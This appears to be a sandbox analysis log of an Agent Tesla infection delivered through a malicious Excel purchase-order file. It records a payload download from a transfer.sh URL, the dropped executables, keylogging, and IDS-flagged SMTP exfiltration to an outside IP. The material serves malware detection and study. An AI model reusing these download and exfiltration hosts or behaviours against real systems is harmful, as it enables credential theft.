Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.22:49176 -> 5.249.163.12:587
Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.22:49176 -> 5.249.163.12:587
Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.22:49177 -> 5.249.163.12:587
Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.22:49177 -> 5.249.163.12:587
Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49176 -> 5.249.163.12:587
Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49177 -> 5.249.163.12:587
Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.22:49178 -> 5.249.163.12:587
Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.22:49178 -> 5.249.163.12:587
Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.22:49179 -> 5.249.163.12:587
Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.22:49179 -> 5.249.163.12:587
Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49178 -> 5.249.163.12:587
Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49179 -> 5.249.163.12:587
May check the online IP address of the machine
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeDNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeDNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeDNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeDNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeDNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeDNS query: name: api.ipify.org
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
Source: global trafficHTTP traffic detected: GET /get/I9BcJI/maxdyn2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: transfer.sh
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /get/I9BcJI/maxdyn2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: transfer.shConnection: Keep-Alive
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
Source: EQNEDT32.EXE, 00000002.00000002.977467875.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.977467875.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: word.exe, 00000005.00000000.974627109.000000000040A000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmp, word.exe.2.dr, maxdyn2.1[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000002.00000002.977467875.00000000002DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transfer.sh/get/I9BcJ
Source: EQNEDT32.EXE, 00000002.00000002.977467875.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transfer.sh/get/I9BcJI/maxdyn2.1.exemWDt
Source: EQNEDT32.EXE, 00000002.00000002.977467875.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transfer.sh/get/I9BcJI/maxdyn2.1.exeyWDt
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000002.00000002.977467875.0000000000311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: EQNEDT32.EXE, 00000002.00000002.977467875.00000000002DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/9
Source: EQNEDT32.EXE, 00000002.00000002.978709046.0000000008E90000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.977467875.00000000002DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/I9BcJI/maxdyn2.1.exe
Source: EQNEDT32.EXE, 00000002.00000002.977467875.00000000002DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/xe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\maxdyn2.1[1].htmJump to behavior
Source: unknownDNS traffic detected: queries for: transfer.sh
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03674CE0 URLDownloadToFileW,2_2_03674CE0
Source: global trafficHTTP traffic detected: GET /get/I9BcJI/maxdyn2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: transfer.sh
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /get/I9BcJI/maxdyn2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: transfer.shConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.22:49174 version: TLS 1.2
Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.22:49175 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Installs a global keyboard hook
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\lyebkz.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_00405809

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\maxdyn2.1[1].exeJump to dropped file
Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403640
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00406D5F5_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_0040E0AD6_2_0040E0AD
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_0041095A6_2_0041095A
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_004112036_2_00411203
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_00411A2F6_2_00411A2F
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_0041160F6_2_0041160F
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_00410E2F6_2_00410E2F
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_00409FAF6_2_00409FAF
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_002408B76_2_002408B7
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: 6_2_00240A3B6_2_00240A3B
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: String function: 004058F2 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeCode function: String function: 00402914 appears 55 times
Source: C21.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: PURCHASE ORDER & SAMPLE IMAGE.xlsxReversingLabs: Detection: 56%
Source: PURCHASE ORDER & SAMPLE IMAGE.xlsxVirustotal: Detection: 59%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\lyebkz.exe "C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess created: C:\Users\user\AppData\Local\Temp\lyebkz.exe C:\Users\user\AppData\Local\Temp\lyebkz.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\lyebkz.exe "C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.txJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeProcess created: C:\Users\user\AppData\Local\Temp\lyebkz.exe C:\Users\user\AppData\Local\Temp\lyebkz.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403640
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PURCHASE ORDER & SAMPLE IMAGE.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR70DB.tmpJump to behavior
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@8/12@9/3
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004021AA CoCreateInstance,5_2_004021AA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,5_2_00404AB5
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
Source: PURCHASE ORDER & SAMPLE IMAGE.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lyebkz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
